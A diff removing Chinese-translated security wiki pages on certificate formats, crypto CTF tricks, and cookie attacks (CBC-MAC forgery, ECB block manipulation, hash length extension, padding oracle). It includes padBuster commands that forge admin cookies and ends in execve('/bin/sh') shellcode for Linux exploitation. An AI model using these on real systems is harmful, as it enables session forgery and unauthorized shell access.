- 最广泛使用的证书格式。
- 需要为证书和私钥分别创建文件,采用 Base64 ASCII 编码。
- 常见扩展名:.cer, .crt, .pem, .key。
- 主要用于 Apache 和类似服务器。
### **DER格式**
- 证书的二进制格式。
- 缺少 PEM 文件中找到的 "BEGIN/END CERTIFICATE" 语句。
- 常见扩展名:.cer, .der。
- 通常与 Java 平台一起使用。
### **P7B/PKCS#7格式**
- 以 Base64 ASCII 存储,扩展名为 .p7b 或 .p7c。
- 仅包含证书和链证书,不包括私钥。
- 受 Microsoft Windows 和 Java Tomcat 支持。
### **PFX/P12/PKCS#12格式**
- 一种二进制格式,将服务器证书、中间证书和私钥封装在一个文件中。
- 扩展名:.pfx, .p12。
- 主要用于 Windows 的证书导入和导出。
### **格式转换**
**PEM 转换** 对于兼容性至关重要:
- **x509 到 PEM**
```bash
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```
- **PEM 转 DER**
```bash
openssl x509 -outform der -in certificatename.pem -out certificatename.der
```
- **DER 转 PEM**
```bash
openssl x509 -inform der -in certificatename.der -out certificatename.pem
```
- **PEM 转 P7B**
```bash
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
```
- **PKCS7 转 PEM**
```bash
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
```
**PFX 转换** 对于在 Windows 上管理证书至关重要:
- **PFX 到 PEM**
```bash
openssl pkcs12 -in certificatename.pfx -out certificatename.pem
```
- **PFX 转 PKCS#8** 涉及两个步骤:
1. 将 PFX 转换为 PEM
```bash
openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
```
2. 将PEM转换为PKCS8
```bash
openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
```
- **P7B 转 PFX** 还需要两个命令:
1. 将 P7B 转换为 CER
```bash
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
```
2. 将 CER 和私钥转换为 PFX
```bash
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
---
{{#include ../banners/hacktricks-training.md}}

55
src/cryptography/cipher-block-chaining-cbc-mac-priv.md
View File

@ -1,55 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
# CBC
如果**cookie**仅仅是**用户名**或者cookie的第一部分是用户名并且你想要冒充用户名“**admin**”。那么,你可以创建用户名**"bdmin"**并**暴力破解**cookie的**第一个字节**。
# CBC-MAC
**密码块链消息认证码****CBC-MAC**)是一种在密码学中使用的方法。它通过逐块加密消息来工作,每个块的加密与前一个块相连。这个过程创建了一个**块链**,确保即使改变原始消息的一个比特,也会导致最后一个加密数据块的不可预测变化。要进行或逆转这样的变化,需要加密密钥,以确保安全性。
要计算消息m的CBC-MAC需在CBC模式下用零初始化向量加密m并保留最后一个块。下图勾勒了使用秘密密钥k和块密码E计算由块组成的消息的CBC-MAC的过程[https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png](<https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png>)
# Vulnerability
在CBC-MAC中通常**使用的IV是0**。\
这是一个问题,因为两个已知消息(`m1``m2`)独立生成两个签名(`s1``s2`)。所以:
- `E(m1 XOR 0) = s1`
- `E(m2 XOR 0) = s2`
然后由m1和m2连接而成的消息m3将生成两个签名s31和s32
- `E(m1 XOR 0) = s31 = s1`
- `E(m2 XOR s1) = s32`
**这可以在不知道加密密钥的情况下计算。**
想象一下你在**8字节**块中加密名称**Administrator**
- `Administ`
- `rator\00\00\00`
你可以创建一个名为**Administ**m1的用户名并获取签名s1。\
然后,你可以创建一个用户名,称为`rator\00\00\00 XOR s1`的结果。这将生成`E(m2 XOR s1 XOR 0)`即s32。\
现在你可以将s32用作完整名称**Administrator**的签名。
### Summary
1. 获取用户名**Administ**m1的签名即s1
2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名即s32**。**
3. 将cookie设置为s32这将是用户**Administrator**的有效cookie。
# Attack Controlling IV
如果你可以控制使用的IV攻击可能会非常简单。\
如果cookie仅仅是加密的用户名要冒充用户“**administrator**”,你可以创建用户“**Administrator**”你将获得它的cookie。\
现在如果你可以控制IV你可以改变IV的第一个字节使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并为用户**Administrator**重新生成cookie。这个cookie将有效地**冒充**用户**administrator**,使用初始**IV**。
## References
更多信息请见[https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
{{#include ../banners/hacktricks-training.md}}

269
src/cryptography/crypto-ctfs-tricks.md
View File

@ -1,269 +0,0 @@
# Crypto CTFs Tricks
{{#include ../banners/hacktricks-training.md}}
## 在线哈希数据库
- _**谷歌一下**_
- [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
- [https://crackstation.net/](https://crackstation.net)
- [https://md5decrypt.net/](https://md5decrypt.net)
- [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
- [https://gpuhash.me/](https://gpuhash.me)
- [https://hashes.org/search.php](https://hashes.org/search.php)
- [https://www.cmd5.org/](https://www.cmd5.org)
- [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
- [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
## 魔法自动解码器
- [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (魔法模块)
- [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
- [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
## 编码器
大多数编码数据可以通过这两个资源解码:
- [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### 替换自动解码器
- [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
- [https://quipqiup.com/](https://quipqiup.com) - 非常好!
#### 凯撒 - ROTx 自动解码器
- [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
#### Atbash 密码
- [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
### 基础编码自动解码器
使用以下链接检查所有这些基础:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
- **Ascii85**
- `BQ%]q@psCd@rH0l`
- **Base26** \[_A-Z_]
- `BQEKGAHRJKHQMVZGKUXNT`
- **Base32** \[_A-Z2-7=_]
- `NBXWYYLDMFZGCY3PNRQQ====`
- **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
- `pbzsaamdcf3gna5xptoo====`
- **Base32 Geohash** \[_0-9b-hjkmnp-z_]
- `e1rqssc3d5t62svgejhh====`
- **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
- `D1QPRRB3C5S62RVFDHGG====`
- **Base32 Extended Hexadecimal** \[_0-9A-V_]
- `D1NMOOB3C5P62ORFDHGG====`
- **Base45** \[_0-9A-Z $%\*+-./:_]
- `59DPVDGPCVKEUPCPVD`
- **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
- `2yJiRg5BF9gmsU6AC`
- **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
- `2YiHqF5bf9FLSt6ac`
- **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
- `pyJ5RgnBE9gm17awU`
- **Base62** \[_0-9A-Za-z_]
- `g2AextRZpBKRBzQ9`
- **Base64** \[_A-Za-z0-9+/=_]
- `aG9sYWNhcmFjb2xh`
- **Base67** \[_A-Za-z0-9-_.!\~\_]
- `NI9JKX0cSUdqhr!p`
- **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
- `BQ%]q@psCd@rH0l`
- **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
- `<~BQ%]q@psCd@rH0l~>`
- **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
- `Xm4y`V\_|Y(V{dF>\`
- **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
- **Base85 (XML)** \[\_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\_\_]
- `Xm4y|V{~Y+V}dF?`
- **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
- `frDg[*jNN!7&BQM`
- **Base100** \[]
- `👟👦👣👘👚👘👩👘👚👦👣👘`
- **Base122** \[]
- `4F ˂r0Xmvc`
- **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
- `MIc3KiXa+Ihz+lrXMIc3KbCC`
- **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
- `DmPsv8J7qrlKEoY7`
- **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
- `kLD8iwKsigSalLJ5`
- **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
- `ayRiIo1gpO+uUc7g`
- **ESAB46** \[]
- `3sHcL2NR8WrT7mhR`
- **MEGAN45** \[]
- `kLD8igSXm2KZlwrX`
- **TIGO3FX** \[]
- `7AP9mIzdmltYmIP9mWXX`
- **TRIPO5** \[]
- `UE9vSbnBW6psVzxB`
- **FERON74** \[]
- `PbGkNudxCzaKBm0x`
- **GILA7** \[]
- `D+nkv8C1qIKMErY1`
- **Citrix CTX1** \[]
- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
[http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 死链接: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
### HackerizeXS \[_╫Λ↻├☰┏_]
```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
```
### 摩尔斯
```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
```
- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 死链接: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### UUencoder
```
begin 644 webutils_pl
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
M3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/
F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
`
end
```
- [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
### XXEncoder
```
begin 644 webutils_pl
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
5Hol-G2xAEE++
end
```
- [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
### YEncoder
```
=ybegin line=128 size=28 name=webutils_pl
ryvkryvkryvkryvkryvkryvkryvk
=yend size=28 crc32=35834c86
```
- [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
### BinHex
```
(This file must be converted with BinHex 4.0)
:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
-38K26%'d9J!!:
```
- [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85
```
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
```
- [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
### Dvorak 键盘
```
drnajapajrna
```
- [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard)
### A1Z26
字母对应其数字值
```
8 15 12 1 3 1 18 1 3 15 12 1
```
### Affine Cipher Encode
字母到数字 `(ax+b)%26` (_a_ 和 _b_ 是密钥_x_ 是字母) 并将结果转换回字母
```
krodfdudfrod
```
### SMS Code
**Multitap** [通过重复的数字](https://www.dcode.fr/word-letter-change) 替换一个字母,这些数字由手机 [键盘](https://www.dcode.fr/phone-keypad-cipher) 上对应的键码定义(此模式在编写短信时使用)。\
例如2=A22=B222=C3=D...\
您可以通过看到**多个数字重复**来识别此代码。
您可以在以下网址解码此代码:[https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
### Bacon Code
将每个字母替换为4个A或B或1和0
```
00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
```
### Runes
![](../images/runes.jpg)
## 压缩
**Raw Deflate** 和 **Raw Inflate**(你可以在 Cyberchef 中找到这两者)可以在没有头部的情况下压缩和解压数据。
## 简易加密
### XOR - 自动解算器
- [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
### Bifid
需要一个关键字
```
fgaargaamnlunesuneoa
```
### Vigenere
需要一个关键词
```
wodsyoidrods
```
- [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
- [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
- [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
## 强加密
### Fernet
2 个 base64 字符串(令牌和密钥)
```
Token:
gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
Key:
-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
```
- [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
### Samir Secret Sharing
一个秘密被分成 X 部分,要恢复它需要 Y 部分 (_Y <=X_)。
```
8019f8fa5879aa3e07858d08308dc1a8b45
80223035713295bddf0b0bd1b10a5340b89
803bc8cf294b3f83d88e86d9818792e80cd
```
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
### OpenSSL 暴力破解
- [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
- [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
## 工具
- [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
- [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
- [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
{{#include ../banners/hacktricks-training.md}}

68
src/cryptography/electronic-code-book-ecb.md
View File

@ -1,68 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
# ECB
(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文的块**。它是**最简单的**加密方案。主要思想是将明文**分割**成**N位的块**(取决于输入数据的块大小和加密算法),然后使用唯一的密钥对每个明文块进行加密(解密)。
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
使用ECB有多种安全隐患
- **可以移除加密消息中的块**
- **可以移动加密消息中的块**
# 漏洞检测
想象一下,你多次登录一个应用程序,并且**总是得到相同的cookie**。这是因为该应用程序的cookie是**`<username>|<password>`**。\
然后,你生成两个新用户,他们都有**相同的长密码**和**几乎相同的** **用户名**。\
你发现**8B的块**中**两个用户的信息**是**相同的**。然后,你想象这可能是因为**正在使用ECB**。
如以下示例所示。观察这**两个解码的cookie**中有几次块**`\x23U\xE45K\xCB\x21\xC8`**。
```
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
```
这是因为这些 cookie 的 **用户名和密码包含了多次字母 "a"**(例如)。**不同的** **块** 是包含 **至少 1 个不同字符** 的块(可能是分隔符 "|" 或用户名中的某些必要差异)。
现在,攻击者只需发现格式是 `<username><delimiter><password>` 还是 `<password><delimiter><username>`。为此,他可以 **生成多个相似且较长的用户名和密码,直到找到格式和分隔符的长度:**
| 用户名长度: | 密码长度: | 用户名+密码长度: | Cookie 的长度(解码后): |
| ------------ | ---------- | ----------------- | ------------------------- |
| 2 | 2 | 4 | 8 |
| 3 | 3 | 6 | 8 |
| 3 | 4 | 7 | 8 |
| 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 |
# 漏洞利用
## 移除整个块
知道 cookie 的格式(`<username>|<password>`),为了冒充用户名 `admin`,创建一个名为 `aaaaaaaaadmin` 的新用户并获取 cookie 并解码它:
```
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
我们可以看到之前用仅包含 `a` 的用户名创建的模式 `\x23U\xE45K\xCB\x21\xC8`。\
然后,您可以删除第一个 8B 块,您将获得一个有效的用户名 `admin` 的 cookie
```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
## 移动块
在许多数据库中,搜索 `WHERE username='admin';``WHERE username='admin ';` 是一样的 _(注意额外的空格)_
因此,冒充用户 `admin` 的另一种方法是:
- 生成一个用户名:`len(<username>) + len(<delimiter) % len(block)`。使用 `8B` 的块大小,可以生成一个名为 `username ` 的用户名,使用分隔符 `|`,块 `<username><delimiter>` 将生成 2 个 8B 的块。
- 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:`admin `
该用户的 cookie 将由 3 个块组成:前 2 个是用户名 + 分隔符的块,第三个是密码(伪装成用户名):`username |admin `
**然后,只需用最后一个块替换第一个块,就可以冒充用户 `admin``admin |username`**
## 参考
- [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](<http://cryptowiki.net/index.php?title=Electronic_Code_Book_(ECB)>)
{{#include ../banners/hacktricks-training.md}}

38
src/cryptography/hash-length-extension-attack.md
View File

@ -1,38 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
# 攻击总结
想象一个服务器,它通过将一个**秘密**附加到一些已知的明文数据上并对该数据进行**签名**来**签名**一些**数据**。如果你知道:
- **秘密的长度**(这也可以从给定的长度范围中暴力破解)
- **明文数据**
- **算法(并且它对这种攻击是脆弱的)**
- **填充是已知的**
- 通常使用默认填充因此如果满足其他3个要求这也是
- 填充根据秘密+数据的长度而变化,这就是为什么需要秘密的长度
那么,**攻击者**可以**附加****数据**并为**之前的数据 + 附加的数据**生成一个有效的**签名**。
## 如何?
基本上,脆弱的算法首先通过**哈希一个数据块**来生成哈希,然后,从**之前**创建的**哈希**(状态)中,他们**添加下一个数据块**并**对其进行哈希**。
然后想象秘密是“secret”数据是“data”"secretdata"的MD5是6036708eba0d11f6ef52ad44e8b74d5b。\
如果攻击者想要附加字符串“append”他可以
- 生成64个“A”的MD5
- 将之前初始化的哈希状态更改为6036708eba0d11f6ef52ad44e8b74d5b
- 附加字符串“append”
- 完成哈希结果哈希将是“secret” + “data” + “padding” + “append”的**有效哈希**
## **工具**
{{#ref}}
https://github.com/iagox86/hash_extender
{{#endref}}
## 参考
你可以在[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)找到对此攻击的详细解释。
{{#include ../banners/hacktricks-training.md}}

102
src/cryptography/padding-oracle-priv.md
View File

@ -1,102 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
<figure><img src="/..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
# CBC - 密码块链接
在 CBC 模式下,**前一个加密块用作 IV**,与下一个块进行异或操作:
![https://defuse.ca/images/cbc_encryption.png](https://defuse.ca/images/cbc_encryption.png)
要解密 CBC需进行**相反的** **操作**
![https://defuse.ca/images/cbc_decryption.png](https://defuse.ca/images/cbc_decryption.png)
注意需要使用**加密** **密钥**和**IV**
# 消息填充
由于加密是在**固定** **大小** **块**中进行的,通常需要在**最后** **块**中进行**填充**以完成其长度。\
通常使用**PKCS7**,它生成的填充**重复**所需的**字节** **数**以**完成**块。例如,如果最后一个块缺少 3 个字节,填充将是 `\x03\x03\x03`
让我们看更多的例子,使用**2 个长度为 8 字节的块**
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
注意在最后一个例子中,**最后一个块是满的,因此只生成了一个填充块**。
# 填充 oracle
当应用程序解密加密数据时,它会首先解密数据;然后会移除填充。在清理填充的过程中,如果**无效填充触发可检测的行为**,则存在**填充 oracle 漏洞**。可检测的行为可以是**错误**、**缺少结果**或**响应变慢**。
如果你检测到这种行为,你可以**解密加密数据**,甚至**加密任何明文**。
## 如何利用
你可以使用 [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) 来利用这种漏洞,或者直接进行
```
sudo apt-get install padbuster
```
为了测试一个网站的cookie是否存在漏洞你可以尝试
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
```
**编码 0** 意味着使用 **base64**(但还有其他可用的编码,请查看帮助菜单)。
您还可以 **利用此漏洞加密新数据。例如,假设 cookie 的内容是 "**_**user=MyUsername**_**",那么您可以将其更改为 "\_user=administrator\_",并在应用程序中提升权限。您还可以使用 `paduster` 指定 -plaintext** 参数来实现这一点:
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
```
如果网站存在漏洞,`padbuster`将自动尝试查找何时发生填充错误,但您也可以使用**-error**参数指示错误消息。
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
```
## 理论
**总结**来说,您可以通过猜测可以用于创建所有**不同填充**的正确值来开始解密加密数据。然后填充oracle攻击将从末尾到开头解密字节猜测哪个将是**创建1、2、3等填充的正确值**。
![](<../images/image (629) (1) (1).png>)
想象一下,您有一些加密文本,占据**2个块**,由**E0到E15**的字节组成。\
为了**解密**最后一个**块****E8**到**E15**),整个块通过“块密码解密”,生成**中间字节I0到I15**。\
最后每个中间字节与之前的加密字节E0到E7进行**异或**运算。因此:
- `C15 = D(E15) ^ E7 = I15 ^ E7`
- `C14 = I14 ^ E6`
- `C13 = I13 ^ E5`
- `C12 = I12 ^ E4`
- ...
现在,可以**修改`E7`直到`C15``0x01`**,这也将是一个正确的填充。因此,在这种情况下:`\x01 = I15 ^ E'7`
因此找到E'7后可以**计算I15**`I15 = 0x01 ^ E'7`
这使我们能够**计算C15**`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
知道**C15**后,现在可以**计算C14**,但这次是通过暴力破解填充`\x02\x02`
这个暴力破解与之前的复杂度相同因为可以计算出值为0x02的`E''15``E''7 = \x02 ^ I15`,因此只需找到生成**`C14`等于`0x02`的**`E'14`。\
然后按照相同的步骤解密C14**`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**按照这个链条,直到您解密整个加密文本。**
## 漏洞检测
注册一个账户并使用该账户登录。\
如果您**多次登录**并始终获得**相同的cookie**,那么应用程序中可能**存在问题**。每次登录时**返回的cookie应该是唯一的**。如果cookie**总是**相同的,它可能始终有效,并且**无法使其失效**。
现在,如果您尝试**修改**该**cookie**,您会看到应用程序返回一个**错误**。\
但是如果您暴力破解填充例如使用padbuster您可以获得另一个有效的cookie适用于不同的用户。这个场景很可能对padbuster存在漏洞。
## 参考
- [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)
<figure><img src="/..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{{#include ../banners/hacktricks-training.md}}

15
src/cryptography/rc4-encrypt-and-decrypt.md
View File

@ -1,15 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
如果你能以某种方式使用 RC4 加密明文,你可以仅使用加密函数解密任何使用相同密码加密的内容。
如果你能加密已知的明文,你也可以提取密码。更多参考资料可以在 HTB Kryptos 机器中找到:
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

9
src/emails-vulns.md
View File

@ -1,9 +0,0 @@
# 邮件漏洞
{{#include ./banners/hacktricks-training.md}}
##
##
{{#include ./banners/hacktricks-training.md}}

542
src/exploiting/linux-exploiting-basic-esp/README.md
View File

@ -1,542 +0,0 @@
# Linux Exploiting (Basic) (SPA)
{{#include ../../banners/hacktricks-training.md}}
## **2.SHELLCODE**
查看内核中断: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “\_\_NR\_”
setreuid(0,0); // \_\_NR_setreuid 70\
execve(“/bin/sh”, args\[], NULL); // \_\_NR_execve 11\
exit(0); // \_\_NR_exit 1
xor eax, eax ; 清空 eax\
xor ebx, ebx ; ebx = 0 因为没有参数要传\
mov al, 0x01 ; eax = 1 —> \_\_NR_exit 1\
int 0x80 ; 执行系统调用
**nasm -f elf assembly.asm** —> 返回一个 .o 文件\
**ld assembly.o -o shellcodeout** —> 生成一个由汇编代码组成的可执行文件,并可以使用 **objdump** 提取操作码\
**objdump -d -Mintel ./shellcodeout** —> 查看它确实是我们的 shellcode 并提取 OpCodes
**检查 shellcode 是否有效**
```
char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80”
void main(){
void (*fp) (void);
fp = (void *)shellcode;
fp();
}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
```
为了查看系统调用是否正确执行,需要编译上述程序,并且系统调用应出现在 **strace ./PROGRAMA_COMPILADO**
在创建 shellcodes 时,可以使用一个技巧。第一条指令是跳转到一个调用。该调用会调用原始代码,并将 EIP 放入栈中。在调用指令之后,我们放入所需的字符串,因此通过这个 EIP我们可以指向字符串并继续执行代码。
EJ **技巧 (/bin/sh)**:
```
jmp 0x1f ; Salto al último call
popl %esi ; Guardamos en ese la dirección al string
movl %esi, 0x8(%esi) ; Concatenar dos veces el string (en este caso /bin/sh)
xorl %eax, %eax ; eax = NULL
movb %eax, 0x7(%esi) ; Ponemos un NULL al final del primer /bin/sh
movl %eax, 0xc(%esi) ; Ponemos un NULL al final del segundo /bin/sh
movl $0xb, %eax ; Syscall 11
movl %esi, %ebx ; arg1=“/bin/sh”
leal 0x8(%esi), %ecx ; arg[2] = {“/bin/sh”, “0”}
leal 0xc(%esi), %edx ; arg3 = NULL
int $0x80 ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL)
xorl %ebx, %ebx ; ebx = NULL
movl %ebx, %eax
inc %eax ; Syscall 1
int $0x80 ; exit(0)
call -0x24 ; Salto a la primera instrución
.string \”/bin/sh\” ; String a usar<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
```
